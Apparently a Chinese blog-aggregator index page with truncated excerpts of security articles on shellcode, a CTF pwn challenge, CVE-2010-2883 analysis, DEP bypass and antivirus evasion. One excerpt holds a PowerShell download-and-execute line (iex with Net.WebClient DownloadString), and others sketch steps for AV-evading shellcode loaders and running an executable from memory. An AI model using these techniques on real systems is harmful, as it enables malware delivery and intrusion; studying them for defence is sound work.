1 shellcode低2Gb警告、应使用高2GB 稳定 :在内核挂钩子:由于每个进程的低2gb 的数据是不同的;所以 在内核挂钩子 因该把 代码 放在 高 2gb。方法1(申请):比如 使用前面的 ExAllocatePool(0,size);分配非分页内存,然后把shellcode 拷贝到 非分... ...
分类:
其他好文 时间:
2019-10-22 12:56:04
阅读次数:
76
题目地址 https://dn.jarvisoj.com/challengefiles/level2.54931449c557d0551c4fc2a10f4778a1 先看一下文件的属性 32位 在看看保护机制 开启了NX 那么就不能shellcode 丢到IDA看看 main函数先执行vulner ...
分类:
其他好文 时间:
2019-10-08 20:31:19
阅读次数:
123
综述 本文内容基于漏洞战争一书中对于漏洞CVE-2010-2883攻击样本的分析,在书中分析的基础上,本文着重展现漏洞利用过程中shellcode的执行过程,通过调试加深对漏洞利用过程的理解。 由于本文图片数量较多,所以分为上下两篇文章发布 由于博客图片显示不清楚,故给出高清原文下载链接: http ...
分类:
其他好文 时间:
2019-09-19 21:02:33
阅读次数:
99
一、AntivirusBypass(绕过杀毒) Find-AVSignature 发现杀软的签名 1、先在靶机(windows 2008)上远程加载位于win7的Invoke-Shellcode.ps1脚本 iex(New-Object Net.WebClient).DownloadString(" ...
分类:
其他好文 时间:
2019-08-30 16:00:03
阅读次数:
86
内存中运行文件 拿exe并在HxD或010中打开 cntrl+a copy as C 粘贴到encrypt.cpp 编译并运行encrypt.cpp 创建shellcode.txt 从shellcode.txt复制char数组,并替换runPE.cpp中的rawData [] 编译生成最终的runP ...
分类:
其他好文 时间:
2019-08-28 10:39:24
阅读次数:
96
0x001 原理 采用分离法,即将ShellCode和加载器分离。方法较LOW但免杀。 本文主要将ShellCode转成HEX,再通过加载器执行ShellCode。 PS: 何为SC加载器,即专门用于加载所提供ShellCode的工具。 如同HTTP发包工具,支持提交HTTP,写死参数最多只能叫EX ...
分类:
编程语言 时间:
2019-07-21 23:59:09
阅读次数:
404
一、原理 DEP - 数据执行保护的缩写,Data Execution Prevention。 他是一套软硬件技术,能够在内存上执行额外检查以帮助防止在系统上运行恶意代码。其基本原理是将数据所在内存页标识为不可执行,当程序溢出成功转入shellcode时,程序会尝试在数据页面上执行指令,此时CPU就 ...
分类:
其他好文 时间:
2019-06-29 01:21:09
阅读次数:
272
Finding the Offset 1. Use the Metasploite pattern_create.rb tool to create 5900 characters. 2.Write the python test script. The shellcode is copied fr ...
分类:
其他好文 时间:
2019-06-27 01:09:07
阅读次数:
143
开启的NX保护 写shellcode 是不可能的,也没有system等函数 存在溢出,算下偏移 变量与bp的距离就等于0x60 这个变量的开栈是根据sp开的 他距离sp0x1c 所以偏移就是 bp-sp-0xc1 画个图吧 ESP| 0x1c |变量| |EBP| 如果就是寻找pop 我理解的这个r ...
分类:
其他好文 时间:
2019-06-12 23:04:39
阅读次数:
121
一、实践目标 1.监控你自己系统的运行状态,看有没有可疑的程序在运行。 2.分析一个恶意软件,就分析Exp2或Exp3中生成后门软件;分析工具尽量使用原生指令或sysinternals,systracer套件。 3.假定将来工作中你觉得自己的主机有问题,就可以用实验中的这个思路,先整个系统监控看能不 ...
分类:
其他好文 时间:
2019-04-07 00:24:45
阅读次数:
232